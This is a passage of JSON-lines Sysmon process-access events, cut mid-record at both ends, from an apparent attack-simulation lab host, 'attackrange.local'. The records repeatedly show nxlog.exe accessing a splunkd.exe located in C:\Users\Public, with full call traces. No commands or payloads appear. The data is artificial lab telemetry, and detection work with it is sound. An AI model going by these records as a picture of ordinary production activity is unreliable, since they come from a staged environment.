(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6172,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:47.531\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:47.531","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6173,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:48.531\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:48.531","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6174,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:49.532\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:49.532","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6175,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:50.532\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:50.532","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6176,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:51.532\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:51.532","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6177,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:52.532\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:52.532","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6178,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:53.532\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 